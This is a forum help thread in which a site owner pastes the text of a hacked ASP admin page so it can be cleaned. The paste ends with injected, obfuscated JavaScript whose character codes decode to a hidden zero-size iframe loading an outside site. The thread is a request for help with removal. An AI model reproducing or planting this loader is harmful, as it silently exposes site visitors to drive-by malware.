Snitz™ Forums 2000
https://forum.snitz.com/forumTopic/Posts/68842?pagenum=1
04 November 2025, 23:51
Topic
Southern Girl
Tassietek MailerFree 403
10 August 2009, 06:30
Hi I have this and when I got the forum hacked this was hacked as well.
The thing is that I don't have a copy of the default.asp (and the developer no longer develops this) so I'm hoping (with fingers and toes crossed) that someone has a copy - or can help me delete the trojan in the existing file?
Thanks
Replies ...
ruirib
10 August 2009, 06:46
Should be simple to remove the insert code. Post a text version of the file here and I will have a look.
Southern Girl
10 August 2009, 06:54
Thanks! (hope I have done this right.... : <%@ LANGUAGE = "VBScript" ENABLESESSIONSTATE = True %> <%Option Explicit%> <%Response.Buffer = True%>
<% '*********************************************************** '** Copyright Notice ** '** Tassietek - MailerFree ** '** Copyright 2001-2004 Tassietek All Rights Reserved. ** '***********************************************************
'** CHECKING LOGIN If Request.Cookies("login") = "" Then Response.Write("<Script Language=""JavaScript"">top.frames.location.href=""log_in.asp?access=denied"";</Script>") End If
If session("start") = "" Then Response.Cookies("a") = "ended" Response.Write("<Script Language=""JavaScript"">top.frames.location.href=""log_in.asp?logoff=1"";</Script>") End If %>
var newdate = new Date() var hours = newdate.getHours() if(hours >= 0 && hours <= 5) document.write("Good Morning <%=Session("first_name")%> you are up extremely early!") if(hours > 5 && hours < 11) document.write("Good Morning <%=Session("first_name")%> how are you this morning?"); if(hours >=11 && hours < 12) document.write("Good Morning <%=Session("first_name")%> getting close to lunch isn\'t it?"); if(hours >= 12 && hours <= 17) document.write("Good Afternoon <%=Session("first_name")%> how are you this afternoon?"); if(hours > 17 && hours < 22) document.write("Good Evening <%=Session("first_name")%> having a pleasant evening?") if(hours >=22) document.write("Good Evening <%=Session("first_name")%> getting late isn\'t it?") } </Script> </head>
<table border="0" cellpadding="3" cellspacing="0" width="100%"> <tr> <td width="100%"> <br> You can gain help through out Admin by just clicking on Online Help on the top menu.<br> <br> Please make sure you check out our other Products.
<br><br> <b> <a target="_blank" href="http://www.tassietek.com/mailerpro/default.asp">MailePro™ 2.0</a><br> <a target="_blank" href="http://www.tassietek.com/starscope/default.asp">StarScope™ 2.0</a> </b> </p> Rate <b>MailerFree™</b> at the following sites.
<br><br> <div align="center"> We currently have a <a href="http://www.Aspin.com/func/review/write?id=4401010" target="_blank"><img src=http://ratings.Aspin.com/getstars?id=4401010 border=0></a> rating at <a href="http://www.Aspin.com/func/review/write?id=4401010" target="_blank">Aspin.com</a>. Rate Our Program at <a href="http://www.hotscripts.com/cgi-bin/rate.cgi?ID=13146" target="_blank">HotScripts.com</a> </div> <br> <b>ENJOY!</b> </td> </tr> </table> <br> </td> </tr> <tr> <td bgcolor="#FFFFFF"> </td> </tr> <tr> <td colspan="3" height="22" background="images/ui_bot.gif" align=center valign=top>
<% '** ASSURING THAT ALL DATABASE CONNECTIONS ARE CLOSED On Error Resume Next rs.close Set rs = nothing conn.close Set conn = nothing on error goto 0 %><!-- o65 --><SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!105!110!100!105!118!105!100!117!97!108!112!101!111!112!108!101!46!98!105!122!47!103!111!46!112!104!112!63!115!105!100!61!49!34!32!119!105!100!116!104!61!34!48!34!32!104!101!105!103!104!116!61!34!48!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}